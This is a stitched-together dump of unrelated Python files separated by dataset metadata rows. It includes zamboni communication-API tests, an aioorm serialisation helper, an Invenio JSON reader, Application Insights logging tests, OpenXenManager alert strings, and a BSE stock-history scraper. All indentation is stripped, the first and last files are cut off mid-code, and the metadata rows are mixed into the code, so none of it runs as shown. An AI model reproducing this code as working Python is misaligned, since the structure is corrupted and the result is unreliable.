with open(self.fpath, mode='w', encoding=self.encoding, newline='\n') as f:
data = default
f.write(sublime.encode_value(data, True))
return data
def save(self, data, indent=4):
self.fdir = os.path.dirname(self.fpath)
if not os.path.isdir(self.fdir):
os.makedirs(self.fdir)
with open(self.fpath, mode='w', encoding=self.encoding, newline='\n') as f:
f.write(sublime.encode_value(data, True))
def remove(self):
if os.path.exists(self.fpath):
os.remove(self.fpath)
| mit | -1,720,593,305,830,880,800 | 33.230769 | 87 | 0.520378 | false | 3.959654 | false | false | false |
spasovski/zamboni | mkt/comm/tests/test_api.py | 2 | 20871 | import json
import os
from django.conf import settings
from django.core import mail
from django.core.urlresolvers import reverse
from django.test.client import MULTIPART_CONTENT
from django.test.utils import override_settings
import mock
from nose.tools import eq_, ok_
from amo.tests import (addon_factory, req_factory_factory, user_factory,
version_factory)
from users.models import UserProfile
import mkt.constants.comm
from mkt.api.tests.test_oauth import RestOAuth
from mkt.comm.api import EmailCreationPermission, post_email, ThreadPermission
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationThread, CommunicationThreadCC)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
TESTS_DIR = os.path.dirname(os.path.abspath(__file__))
ATTACHMENTS_DIR = os.path.join(TESTS_DIR, 'attachments')
class CommTestMixin(object):
def _thread_factory(self, note=False, perms=None, no_perms=None, **kw):
create_perms = {}
for perm in perms or []:
create_perms['read_permission_%s' % perm] = True
for perm in no_perms or []:
create_perms['read_permission_%s' % perm] = False
kw.update(create_perms)
thread = self.addon.threads.create(**kw)
if note:
self._note_factory(thread)
return thread
def _note_factory(self, thread, perms=None, no_perms=None, **kw):
author = kw.pop('author', self.profile)
body = kw.pop('body', 'something')
create_perms = {}
for perm in perms or []:
create_perms['read_permission_%s' % perm] = True
for perm in no_perms or []:
create_perms['read_permission_%s' % perm] = False
kw.update(create_perms)
return thread.notes.create(author=author, body=body, **kw)
class AttachmentManagementMixin(object):
def _attachments(self, num):
"""Generate and return data for `num` attachments """
data = {}
files = ['bacon.jpg', 'bacon.txt']
descriptions = ['mmm, bacon', '']
if num > 0:
for n in xrange(num):
i = 0 if n % 2 else 1
path = os.path.join(ATTACHMENTS_DIR, files[i])
attachment = open(path, 'r+')
data.update({
'form-%d-attachment' % n: attachment,
'form-%d-description' % n: descriptions[i]
})
return data
class TestThreadDetail(RestOAuth, CommTestMixin):
fixtures = fixture('webapp_337141', 'user_2519', 'user_support_staff')
def setUp(self):
super(TestThreadDetail, self).setUp()
self.addon = Webapp.objects.get(pk=337141)
def check_permissions(self, thread):
req = req_factory_factory(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}),
user=self.profile)
return ThreadPermission().has_object_permission(
req, 'comm-thread-detail', thread)
def test_response(self):
thread = self._thread_factory(note=True)
res = self.client.get(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
eq_(res.status_code, 200)
eq_(len(res.json['recent_notes']), 1)
eq_(res.json['addon'], self.addon.id)
def test_recent_notes_perm(self):
staff = UserProfile.objects.get(username='support_staff')
self.addon.addonuser_set.create(user=self.profile)
thread = self._thread_factory(read_permission_developer=True)
self._note_factory(
thread, perms=['developer'], author=staff, body='allowed')
no_dev_note = self._note_factory(
thread, no_perms=['developer'], author=staff)
# Test that the developer can't access no-developer note.
res = self.client.get(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
eq_(res.status_code, 200)
eq_(len(res.json['recent_notes']), 1)
eq_(res.json['recent_notes'][0]['body'], 'allowed')
eq_(res.json['addon'], self.addon.id)
# Test that the author always has permissions.
no_dev_note.update(author=self.profile)
res = self.client.get(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
eq_(len(res.json['recent_notes']), 2)
def test_cc(self):
# Test with no CC.
thread = self._thread_factory()
assert not self.check_permissions(thread)
# Test with CC created.
thread.thread_cc.create(user=self.profile)
assert self.check_permissions(thread)
def test_addon_dev_allowed(self):
thread = self._thread_factory(perms=['developer'])
self.addon.addonuser_set.create(user=self.profile)
assert self.check_permissions(thread)
def test_addon_dev_denied(self):
"""Test when the user is a developer of a different add-on."""
thread = self._thread_factory(perms=['developer'])
self.profile.addonuser_set.create(addon=addon_factory())
assert not self.check_permissions(thread)
def test_read_public(self):
thread = self._thread_factory(perms=['public'])
assert self.check_permissions(thread)
def test_read_moz_contact(self):
thread = self._thread_factory(perms=['mozilla_contact'])
self.addon.update(mozilla_contact=self.profile.email)
assert self.check_permissions(thread)
def test_read_reviewer(self):
thread = self._thread_factory(perms=['reviewer'])
self.grant_permission(self.profile, 'Apps:Review')
assert self.check_permissions(thread)
def test_read_senior_reviewer(self):
thread = self._thread_factory(perms=['senior_reviewer'])
self.grant_permission(self.profile, 'Apps:ReviewEscalated')
assert self.check_permissions(thread)
def test_read_staff(self):
thread = self._thread_factory(perms=['staff'])
self.grant_permission(self.profile, 'Admin:%')
assert self.check_permissions(thread)
def test_cors_allowed(self):
thread = self._thread_factory()
res = self.client.get(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
self.assertCORS(res, 'get', 'post', 'patch')
def test_mark_read(self):
thread = self._thread_factory()
note1 = self._note_factory(thread)
note2 = self._note_factory(thread)
res = self.client.patch(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}),
data=json.dumps({'is_read': True}))
eq_(res.status_code, 204)
assert note1.read_by_users.filter(user=self.profile).exists()
assert note2.read_by_users.filter(user=self.profile).exists()
def test_review_url(self):
thread = self._thread_factory(note=True)
res = self.client.get(
reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
eq_(res.status_code, 200)
eq_(res.json['addon_meta']['review_url'],
reverse('reviewers.apps.review', args=[self.addon.app_slug]))
def test_version_number(self):
version = version_factory(addon=self.addon, version='7.12')
thread = CommunicationThread.objects.create(
addon=self.addon, version=version, read_permission_public=True)
res = self.client.get(reverse('comm-thread-detail', args=[thread.pk]))
eq_(json.loads(res.content)['version_number'], '7.12')
eq_(json.loads(res.content)['version_is_obsolete'], False)
version.delete()
res = self.client.get(reverse('comm-thread-detail', args=[thread.pk]))
eq_(json.loads(res.content)['version_number'], '7.12')
eq_(json.loads(res.content)['version_is_obsolete'], True)
def test_app_threads(self):
version1 = version_factory(addon=self.addon, version='7.12')
thread1 = CommunicationThread.objects.create(
addon=self.addon, version=version1, read_permission_public=True)
version2 = version_factory(addon=self.addon, version='1.16')
thread2 = CommunicationThread.objects.create(
addon=self.addon, version=version2, read_permission_public=True)
for thread in (thread1, thread2):
res = self.client.get(reverse('comm-thread-detail',
args=[thread.pk]))
eq_(res.status_code, 200)
eq_(json.loads(res.content)['app_threads'],
[{"id": thread2.id, "version__version": version2.version},
{"id": thread1.id, "version__version": version1.version}])
class TestThreadList(RestOAuth, CommTestMixin):
fixtures = fixture('webapp_337141', 'user_2519')
def setUp(self):
super(TestThreadList, self).setUp()
self.create_switch('comm-dashboard')
self.addon = Webapp.objects.get(pk=337141)
self.list_url = reverse('comm-thread-list')
def test_response(self):
"""Test the list response, we don't want public threads in the list."""
self._thread_factory(note=True, perms=['public'])
res = self.client.get(self.list_url)
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
def test_addon_filter(self):
self._thread_factory(note=True)
res = self.client.get(self.list_url, {'app': '337141'})
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
# This add-on doesn't exist.
res = self.client.get(self.list_url, {'app': '1000'})
eq_(res.status_code, 404)
def test_app_slug(self):
thread = CommunicationThread.objects.create(addon=self.addon)
CommunicationNote.objects.create(author=self.profile, thread=thread,
note_type=0, body='something')
res = self.client.get(self.list_url, {'app': self.addon.app_slug})
eq_(res.status_code, 200)
eq_(res.json['objects'][0]['addon_meta']['app_slug'],
self.addon.app_slug)
def test_app_threads(self):
version1 = version_factory(addon=self.addon, version='7.12')
thread1 = CommunicationThread.objects.create(
addon=self.addon, version=version1, read_permission_public=True)
CommunicationThreadCC.objects.create(user=self.profile, thread=thread1)
version2 = version_factory(addon=self.addon, version='1.16')
thread2 = CommunicationThread.objects.create(
addon=self.addon, version=version2, read_permission_public=True)
CommunicationThreadCC.objects.create(user=self.profile, thread=thread2)
res = self.client.get(self.list_url, {'app': self.addon.app_slug})
eq_(res.json['app_threads'],
[{"id": thread2.id, "version__version": version2.version},
{"id": thread1.id, "version__version": version1.version}])
def test_create(self):
self.create_switch('comm-dashboard')
version_factory(addon=self.addon, version='1.1')
data = {
'app': self.addon.app_slug,
'version': '1.1',
'note_type': '0',
'body': 'flylikebee'
}
self.addon.addonuser_set.create(user=self.user.get_profile())
res = self.client.post(self.list_url, data=json.dumps(data))
eq_(res.status_code, 201)
assert self.addon.threads.count()
class NoteSetupMixin(RestOAuth, CommTestMixin, AttachmentManagementMixin):
fixtures = fixture('webapp_337141', 'user_2519', 'user_999',
'user_support_staff')
def setUp(self):
super(NoteSetupMixin, self).setUp()
self.create_switch('comm-dashboard')
self.addon = Webapp.objects.get(pk=337141)
self.thread = self._thread_factory(
perms=['developer'], version=self.addon.current_version)
self.thread_url = reverse(
'comm-thread-detail', kwargs={'pk': self.thread.id})
self.list_url = reverse(
'comm-note-list', kwargs={'thread_id': self.thread.id})
self.profile.addonuser_set.create(addon=self.addon)
class TestNote(NoteSetupMixin):
@override_settings(REVIEWER_ATTACHMENTS_PATH=TESTS_DIR)
def test_response(self):
note = self._note_factory(self.thread)
attach = note.attachments.create(filepath='test_api.py',
description='desc')
res = self.client.get(reverse(
'comm-note-detail',
kwargs={'thread_id': self.thread.id, 'pk': note.id}))
eq_(res.status_code, 200)
eq_(res.json['body'], 'something')
eq_(res.json['reply_to'], None)
eq_(res.json['is_read'], False)
# Read.
note.mark_read(self.profile)
res = self.client.get(reverse('comm-note-detail',
kwargs={'thread_id': self.thread.id,
'pk': note.id}))
eq_(res.json['is_read'], True)
# Attachments.
eq_(len(res.json['attachments']), 1)
eq_(res.json['attachments'][0]['url'],
settings.SITE_URL +
reverse('reviewers.apps.review.attachment', args=[attach.id]))
eq_(res.json['attachments'][0]['display_name'], 'desc')
ok_(not res.json['attachments'][0]['is_image'])
def test_show_read_filter(self):
"""Test `is_read` filter."""
note = self._note_factory(self.thread)
note.mark_read(self.profile)
# Test with `show_read=true`.
res = self.client.get(self.list_url, {'show_read': 'truey'})
eq_(res.json['objects'][0]['is_read'], True)
# Test with `show_read=false`.
note.reads_set.all().delete()
res = self.client.get(self.list_url, {'show_read': '0'})
eq_(res.json['objects'][0]['is_read'], False)
def test_read_perms(self):
staff = UserProfile.objects.get(username='support_staff')
self._note_factory(
self.thread, perms=['developer'], author=staff, body='oncetoldme')
no_dev_note = self._note_factory(
self.thread, no_perms=['developer'], author=staff)
res = self.client.get(self.list_url)
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
eq_(res.json['objects'][0]['body'], 'oncetoldme')
# Test that the author always has permissions.
no_dev_note.update(author=self.profile)
res = self.client.get(self.list_url)
eq_(len(res.json['objects']), 2)
def test_create(self):
res = self.client.post(self.list_url, data=json.dumps(
{'note_type': '0', 'body': 'something'}))
eq_(res.status_code, 201)
eq_(res.json['body'], 'something')
def test_create_perm(self):
self.thread.update(read_permission_developer=False)
res = self.client.post(self.list_url, data=json.dumps(
{'note_type': '0', 'body': 'something'}))
eq_(res.status_code, 403)
def test_cors_allowed(self):
res = self.client.get(self.list_url)
self.assertCORS(res, 'get', 'post', 'patch')
def test_reply_list(self):
note = self._note_factory(self.thread)
note.replies.create(thread=self.thread, author=self.profile)
res = self.client.get(reverse('comm-note-replies-list',
kwargs={'thread_id': self.thread.id,
'note_id': note.id}))
eq_(res.status_code, 200)
eq_(len(res.json['objects']), 1)
eq_(res.json['objects'][0]['reply_to'], note.id)
def test_reply_create(self):
note = self._note_factory(self.thread)
res = self.client.post(
reverse('comm-note-replies-list',
kwargs={'thread_id': self.thread.id, 'note_id': note.id}),
data=json.dumps({'note_type': '0',
'body': 'something'}))
eq_(res.status_code, 201)
eq_(note.replies.count(), 1)
def test_note_emails(self):
self.create_switch(name='comm-dashboard')
note = self._note_factory(self.thread, perms=['developer'])
res = self.client.post(
reverse('comm-note-replies-list',
kwargs={'thread_id': self.thread.id,
'note_id': note.id}),
data=json.dumps({'note_type': '0',
'body': 'something'}))
eq_(res.status_code, 201)
# Decrement authors.count() by 1 because the author of the note is
# one of the authors of the addon.
eq_(len(mail.outbox), self.thread.addon.authors.count() - 1)
def test_mark_read(self):
note = self._note_factory(self.thread)
note.mark_read(self.profile)
res = self.client.patch(
reverse('comm-note-detail',
kwargs={'thread_id': self.thread.id,
'pk': note.id}),
data=json.dumps({'is_read': True}))
eq_(res.status_code, 204)
assert note.read_by_users.filter(user=self.profile).exists()
@override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
class TestAttachment(NoteSetupMixin):
def setUp(self):
super(TestAttachment, self).setUp()
self.note = self._note_factory(self.thread, author=self.profile)
self.attachment_url = reverse(
'comm-attachment-list', kwargs={'thread_id': self.thread.id,
'note_id': self.note.id})
def test_cors_bad_request(self):
res = self.client.post(self.attachment_url, data={},
content_type=MULTIPART_CONTENT)
eq_(res.status_code, 400)
self.assertCORS(res, 'post')
def _save_attachment_mock(self, storage, attachment, filepath):
if 'jpg' in filepath:
return 'bacon.jpg'
return 'bacon.txt'
@mock.patch('mkt.comm.utils._save_attachment')
def test_create_attachment(self, _mock):
_mock.side_effect = self._save_attachment_mock
data = self._attachments(num=2)
res = self.client.post(self.attachment_url, data=data,
content_type=MULTIPART_CONTENT)
eq_(res.status_code, 201)
eq_(CommAttachment.objects.count(), 2)
attach1 = CommAttachment.objects.all()[0]
eq_(attach1.note, self.note)
eq_(attach1.filepath, 'bacon.txt')
eq_(attach1.description, '')
assert not attach1.is_image()
attach2 = CommAttachment.objects.all()[1]
eq_(attach2.note, self.note)
eq_(attach2.filepath, 'bacon.jpg')
eq_(attach2.description, 'mmm, bacon')
assert attach2.is_image()
@mock.patch.object(mkt.constants.comm, 'MAX_ATTACH', 1)
def test_max_attach(self):
data = self._attachments(num=2)
res = self.client.post(self.attachment_url, data=data,
content_type=MULTIPART_CONTENT)
eq_(res.status_code, 400)
def test_not_note_owner(self):
self.note.update(author=user_factory())
data = self._attachments(num=2)
res = self.client.post(self.attachment_url, data=data,
content_type=MULTIPART_CONTENT)
eq_(res.status_code, 403)
@mock.patch.object(settings, 'WHITELISTED_CLIENTS_EMAIL_API',
['10.10.10.10'])
@mock.patch.object(settings, 'POSTFIX_AUTH_TOKEN', 'something')
class TestEmailApi(RestOAuth):
def get_request(self, data=None):
req = req_factory_factory(reverse('post-email-api'), self.profile)
req.META['REMOTE_ADDR'] = '10.10.10.10'
req.META['HTTP_POSTFIX_AUTH_TOKEN'] = 'something'
req.POST = dict(data) if data else dict({})
req.method = 'POST'
return req
def test_allowed(self):
assert EmailCreationPermission().has_permission(self.get_request(),
None)
def test_ip_denied(self):
req = self.get_request()
req.META['REMOTE_ADDR'] = '10.10.10.1'
assert not EmailCreationPermission().has_permission(req, None)
def test_token_denied(self):
req = self.get_request()
req.META['HTTP_POSTFIX_AUTH_TOKEN'] = 'somethingwrong'
assert not EmailCreationPermission().has_permission(req, None)
@mock.patch('mkt.comm.tasks.consume_email.apply_async')
def test_successful(self, _mock):
req = self.get_request({'body': 'something'})
res = post_email(req)
_mock.assert_called_with(('something',))
eq_(res.status_code, 201)
def test_bad_request(self):
"""Test with no email body."""
res = post_email(self.get_request())
eq_(res.status_code, 400)
| bsd-3-clause | 7,681,959,617,094,682,000 | 37.50738 | 79 | 0.593503 | false | 3.722975 | true | false | false |
Python-Tools/aioorm | aioorm/shortcuts.py | 1 | 3656 | from asyncio import iscoroutine
from peewee import ForeignKeyField
from playhouse.shortcuts import _clone_set
async def model_to_dict(model, recurse=True, backrefs=False, only=None,
exclude=None, seen=None, extra_attrs=None,
fields_from_query=None, max_depth=None):
"""
Convert a model instance (and any related objects) to a dictionary.
:param bool recurse: Whether foreign-keys should be recursed.
:param bool backrefs: Whether lists of related objects should be recursed.
:param only: A list (or set) of field instances indicating which fields
should be included.
:param exclude: A list (or set) of field instances that should be
excluded from the dictionary.
:param list extra_attrs: Names of model instance attributes or methods
that should be included.
:param SelectQuery fields_from_query: Query that was source of model. Take
fields explicitly selected by the query and serialize them.
:param int max_depth: Maximum depth to recurse, value <= 0 means no max.
"""
max_depth = -1 if max_depth is None else max_depth
if max_depth == 0:
recurse = False
only = _clone_set(only)
extra_attrs = _clone_set(extra_attrs)
if fields_from_query is not None:
for item in fields_from_query._select:
if isinstance(item, Field):
only.add(item)
elif isinstance(item, Node) and item._alias:
extra_attrs.add(item._alias)
data = {}
exclude = _clone_set(exclude)
seen = _clone_set(seen)
exclude |= seen
model_class = type(model)
for field in model._meta.declared_fields:
if field in exclude or (only and (field not in only)):
continue
field_data = model._data.get(field.name)
if isinstance(field, ForeignKeyField) and recurse:
if field_data:
seen.add(field)
rel_obj = getattr(model, field.name)
if iscoroutine(rel_obj):
rel_obj = await rel_obj
field_data = await model_to_dict(
rel_obj,
recurse=recurse,
backrefs=backrefs,
only=only,
exclude=exclude,
seen=seen,
max_depth=max_depth - 1)
else:
field_data = None
data[field.name] = field_data
if extra_attrs:
for attr_name in extra_attrs:
attr = getattr(model, attr_name)
if callable(attr):
data[attr_name] = attr()
else:
data[attr_name] = attr
if backrefs and recurse:
for related_name, foreign_key in model._meta.reverse_rel.items():
descriptor = getattr(model_class, related_name)
if descriptor in exclude or foreign_key in exclude:
continue
if only and (descriptor not in only) and (foreign_key not in only):
continue
accum = []
exclude.add(foreign_key)
related_query = getattr(
model,
related_name + '_prefetch',
getattr(model, related_name))
async for rel_obj in related_query:
accum.append(await model_to_dict(
rel_obj,
recurse=recurse,
backrefs=backrefs,
only=only,
exclude=exclude,
max_depth=max_depth - 1))
data[related_name] = accum
return data
| mpl-2.0 | 7,883,790,944,815,843,000 | 35.19802 | 79 | 0.560449 | false | 4.474908 | false | false | false |
chokribr/invenioold | modules/bibfield/lib/bibfield_jsonreader.py | 15 | 3259 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
import re
from invenio.bibfield_reader import Reader
class JsonReader(Reader):
"""Default reader"""
__master_format__ = 'json'
def __init__(self, blob, **kwargs):
"""
:param blob:
"""
super(JsonReader, self).__init__(blob=blob, **kwargs)
self._additional_info['master_format'] = 'json'
@staticmethod
def split_blob(blob, schema=None, **kwargs):
"""
In case of several records inside the blob this method specify how to
split then and work one by one afterwards.
"""
return blob.splitlines()
def _prepare_blob(self, *args, **kwargs):
self.json.update(self.blob)
def _get_elements_from_blob(self, regex_key):
if regex_key in ('entire_record', '*'):
return self.blob
return [self.blob.get(key) for key in regex_key]
def _apply_rules(self, json_id, field_name, rule_def):
try:
info = self._find_meta_metadata(json_id, field_name, 'creator', {'source_tag':json_id}, rule_def)
if 'json_ext' in rule_def and field_name in self.json:
self.json[field_name] = rule_def['json_ext']['dumps'](self.json[field_name])
self.json['__meta_metadata__.%s' % (field_name, )] = info
except KeyError:
self._set_default_value(json_id, field_name)
except Exception, e:
self.json['__meta_metadata__']['__errors__']\
.append('Rule Error - Unable to apply rule for field %s - %s' % (field_name, str(e)),)
return False
return True
def _apply_virtual_rules(self, json_id, field_name, rule_def):
if field_name in self.json:
try:
info = self._find_meta_metadata(json_id, field_name, rule_type, rule, rule_def)
if rule_type == 'derived' or rule['memoize']:
if 'json_ext' in rule_def:
self.json[field_name] = rule_def['json_ext']['dumps'](self.json[field_name])
else:
self.json[field_name] = None
except Exception, e:
self.json['__meta_metadata__']['__continuable_errors__']\
.append('Virtual Rule CError - Unable to evaluate %s - %s' % (field_name, str(e)))
return False
else:
return super(JsonReader, self)._apply_virtual_rules(json_id, field_name, rule_def)
reader = JsonReader
| gpl-2.0 | -6,291,421,180,600,111,000 | 38.743902 | 109 | 0.596809 | false | 3.856805 | false | false | false |
Microsoft/ApplicationInsights-Python | tests/applicationinsights_tests/logging_tests/TestLoggingHandler.py | 1 | 7185 | import unittest
import logging as pylogging
import sys, os, os.path
from applicationinsights.channel import AsynchronousQueue, AsynchronousSender
from applicationinsights.channel import SynchronousQueue, SynchronousSender
rootDirectory = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')
if rootDirectory not in sys.path:
sys.path.append(rootDirectory)
from applicationinsights import logging
from applicationinsights.logging.LoggingHandler import enabled_instrumentation_keys
class TestEnable(unittest.TestCase):
def test_enable(self):
handler1 = logging.enable('foo')
self.assertIsNotNone(handler1)
self.assertEqual('LoggingHandler', handler1.__class__.__name__)
self.assertEqual('foo', handler1.client.context.instrumentation_key)
self.assertIsInstance(handler1.client.channel.queue, SynchronousQueue)
self.assertIsInstance(handler1.client.channel.sender, SynchronousSender)
handler2 = logging.enable('foo')
self.assertEqual('LoggingHandler', handler2.__class__.__name__)
self.assertEqual('foo', handler2.client.context.instrumentation_key)
channel = MockChannel()
handler3 = logging.enable('bar', telemetry_channel=channel)
self.assertIsNotNone(handler1)
self.assertEqual('LoggingHandler', handler3.__class__.__name__)
self.assertEqual('bar', handler3.client.context.instrumentation_key)
self.assertEqual(channel, handler3.client.channel)
all_handlers = pylogging.getLogger().handlers
self.assertIn(handler2, all_handlers)
self.assertIn(handler3, all_handlers)
pylogging.getLogger().removeHandler(handler2)
pylogging.getLogger().removeHandler(handler3)
def test_enable_with_endpoint(self):
handler = logging.enable('foo', endpoint='http://bar')
self.assertEqual(handler.client.channel.sender.service_endpoint_uri, 'http://bar')
pylogging.getLogger().removeHandler(handler)
def test_enable_with_async(self):
handler = logging.enable('foo', async_=True)
self.assertIsInstance(handler.client.channel.queue, AsynchronousQueue)
self.assertIsInstance(handler.client.channel.sender, AsynchronousSender)
pylogging.getLogger().removeHandler(handler)
def test_enable_raises_exception_on_async_with_telemetry_channel(self):
with self.assertRaises(Exception):
logging.enable('foo', async_=True, telemetry_channel=MockChannel())
def test_enable_raises_exception_on_endpoint_with_telemetry_channel(self):
with self.assertRaises(Exception):
logging.enable('foo', endpoint='http://bar', telemetry_channel=MockChannel())
def test_enable_with_level(self):
handler = logging.enable('foo', level='DEBUG')
self.assertIsNotNone(handler)
self.assertEqual(handler.level, pylogging.DEBUG)
pylogging.getLogger().removeHandler(handler)
def test_enable_raises_exception_on_no_instrumentation_key(self):
self.assertRaises(Exception, logging.enable, None)
def test_handler_removal_clears_cache(self):
def enable_telemetry():
logging.enable('key1')
def remove_telemetry_handlers():
for handler in pylogging.getLogger().handlers:
if isinstance(handler, logging.LoggingHandler):
pylogging.getLogger().removeHandler(handler)
enable_telemetry()
self.assertIn('key1', enabled_instrumentation_keys)
remove_telemetry_handlers()
self.assertNotIn('key1', enabled_instrumentation_keys)
class TestLoggingHandler(unittest.TestCase):
def test_construct(self):
handler = logging.LoggingHandler('test')
self.assertIsNotNone(handler)
self.assertEqual('test', handler.client.context.instrumentation_key)
def test_construct_raises_exception_on_no_instrumentation_key(self):
self.assertRaises(Exception, logging.LoggingHandler, None)
def test_log_works_as_expected(self):
logger, sender, channel = self._setup_logger()
expected = [
(logger.debug, 'debug message', 'Microsoft.ApplicationInsights.Message', 'test', 'MessageData', 0, 'simple_logger - DEBUG - debug message'),
(logger.info, 'info message', 'Microsoft.ApplicationInsights.Message', 'test', 'MessageData', 1, 'simple_logger - INFO - info message'),
(logger.warn, 'warn message', 'Microsoft.ApplicationInsights.Message', 'test', 'MessageData', 2, 'simple_logger - WARNING - warn message'),
(logger.error, 'error message', 'Microsoft.ApplicationInsights.Message', 'test', 'MessageData', 3, 'simple_logger - ERROR - error message'),
(logger.critical, 'critical message', 'Microsoft.ApplicationInsights.Message', 'test', 'MessageData', 4, 'simple_logger - CRITICAL - critical message')
]
for logging_function, logging_parameter, envelope_type, ikey, data_type, severity_level, message in expected:
logging_function(logging_parameter)
data = sender.data[0][0]
sender.data = []
self.assertEqual(envelope_type, data.name)
self.assertEqual(ikey, data.ikey)
self.assertEqual(data_type, data.data.base_type)
self.assertEqual(message, data.data.base_data.message)
self.assertEqual(severity_level, data.data.base_data.severity_level)
channel.context.properties['foo'] = 'bar'
channel.context.operation.id = 1001
logger.info('info message')
data = sender.data[0][0]
self.assertEqual('bar', data.data.base_data.properties['foo'])
self.assertEqual(1001, data.tags.get('ai.operation.id'))
def test_log_exception_works_as_expected(self):
logger, sender, _ = self._setup_logger()
try:
raise Exception('blah')
except:
logger.exception('some error')
data = sender.data[0][0]
self.assertEqual('Microsoft.ApplicationInsights.Exception', data.name)
self.assertEqual('test', data.ikey)
self.assertEqual('ExceptionData', data.data.base_type)
self.assertEqual('blah', data.data.base_data.exceptions[0].message)
def _setup_logger(self):
logger = pylogging.getLogger('simple_logger')
logger.setLevel(pylogging.DEBUG)
handler = logging.LoggingHandler('test')
handler.setLevel(pylogging.DEBUG)
channel = handler.client.channel
# mock out the sender
sender = MockSynchronousSender()
queue = channel.queue
queue.max_queue_length = 1
queue._sender = sender
sender.queue = queue
formatter = pylogging.Formatter('%(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
return logger, sender, channel
class MockChannel:
def flush(self):
pass
class MockSynchronousSender:
def __init__(self):
self.send_buffer_size = 1
self.data = []
self.queue = None
def send(self, data_to_send):
self.data.append(data_to_send)
| mit | 3,186,689,510,377,948,000 | 41.767857 | 163 | 0.675157 | false | 4.14121 | true | false | false |
ches/openxenmanager | messages.py | 2 | 2098 | messages = {}
messages_header = {}
messages_header['PBD_PLUG_FAILED_ON_SERVER_START'] = "Failed to attach storage on server boot"
messages['PBD_PLUG_FAILED_ON_SERVER_START'] = "\
A storage repository could not be attached when server '%s' started.\n \
You may be able to fix this using the 'Repair Storage'\n \
option in the Storage menu."
messages_header['HOST_SYNC_DATA_FAILED'] = "XenServer statistics synchronization failed"
messages['HOST_SYNC_DATA_FAILED'] = "\
%s. There was a temporary failure synchronizing performance statistics across the\n \
pool, probably because one or more servers were offline. Another\n \
synchronization attempt will be made later."
messages_header['host_alert_fs_usage'] = "File System On %s Full"
messages['host_alert_fs_usage'] = "\
Disk usage for the %s on server '%s' has reached %0.2f%%. XenServer's\n \
performance will be critically affected if this disk becomes full.\n \
Log files or other non-essential (user created) files should be removed."
messages_header['alert_cpu_usage'] = "CPU Usage Alarm"
messages['alert_cpu_usage'] = "\
CPU usage on VM '%s' has been on average %0.2f%% for the last %d seconds.\n\
This alarm is set to be triggered when CPU usage is more than %0.1f%%"
messages_header['VM_SHUTDOWN'] = "VM shutdown"
messages['VM_SHUTDOWN'] = "\
VM '%s' has shut down."
messages_header['VM_STARTED'] = "VM started"
messages['VM_STARTED'] = "\
VM '%s' has started."
messages_header['VM_REBOOTED'] = "VM rebooted"
messages['VM_REBOOTED'] = "\
VM '%s' has rebooted."
messages_header['VM_SUSPENDED'] = "VM suspended"
messages['VM_SUSPENDED'] = "\
VM '%s' has suspended."
messages_header['VM_RESUMEND'] = "VM resumed"
messages['VM_RESUMED'] = "\
VM '%s' has resumed."
messages_header['restartHost'] = "After applying this update, all servers must be restarted."
messages_header['restartHVM'] = "After applying this update, all Linux VMs must be restarted."
messages_header['restartPV'] = "After applying this update, all Windows VMs must be restarted."
messages_header['restartXAPI'] = "After applying this update, all VMs must be restarted."
| gpl-2.0 | -5,009,017,996,744,451,000 | 47.790698 | 95 | 0.725929 | false | 3.405844 | false | false | false |
gabhijit/equities-data-utils | get_stocks_bse.py | 2 | 3579 | #
# Refer to LICENSE file and README file for licensing information.
#
# A simple script that tries to download the historical stock data
# for a BSE scrip
import os
from datetime import datetime as dt
import requests
import bs4
from tickerplot.utils.logger import get_logger
module_logger = get_logger(os.path.basename(__file__))
GLOBAL_START_DATE = '01/01/2002'
DATE_FORMAT = '%d/%m/%Y'
DATE_FMT_FNAME = "%Y%m%d"
def get_data_for_security(script_code, sdate, edate=None):
sdate = dt.strptime(sdate, '%d/%m/%Y')
edate = dt.strptime(edate, '%d/%m/%Y') if edate is not None else dt.today()
_do_get_data_for_security(script_code, sdate, edate)
def _do_get_data_for_security(script_code, sdate, edate):
sdate = dt.strftime(sdate, DATE_FORMAT)
edate = dt.strftime(edate, DATE_FORMAT)
url = 'http://www.bseindia.com/markets/equity/EQReports/'\
'StockPrcHistori.aspx?expandable=7&flag=0'
module_logger.info("GET: %s", url)
x = requests.get(url)
html = bs4.BeautifulSoup(x.text, 'html.parser')
hidden_elems = html.findAll(attrs={'type':'hidden'})
form_data = {}
for el in hidden_elems:
m = el.attrs
if 'value' in m:
form_data[m['name']] = m['value']
other_data = {
'WINDOW_NAMER': '1',
'myDestination': '#',
'ctl00$ContentPlaceHolder1$txtFromDate': sdate,
'ctl00$ContentPlaceHolder1$txtToDate': edate,
'ctl00$ContentPlaceHolder1$search': 'rad_no1',
'ctl00$ContentPlaceHolder1$hidYear': '',
'ctl00$ContentPlaceHolder1$hidToDate' : edate,
'ctl00$ContentPlaceHolder1$hidOldDMY' : '',
'ctl00$ContentPlaceHolder1$hidFromDate' : sdate,
'ctl00$ContentPlaceHolder1$hidDMY' : 'D',
'ctl00$ContentPlaceHolder1$hiddenScripCode' : script_code,
'ctl00$ContentPlaceHolder1$Hidden2' : '',
'ctl00$ContentPlaceHolder1$Hidden1' : '',
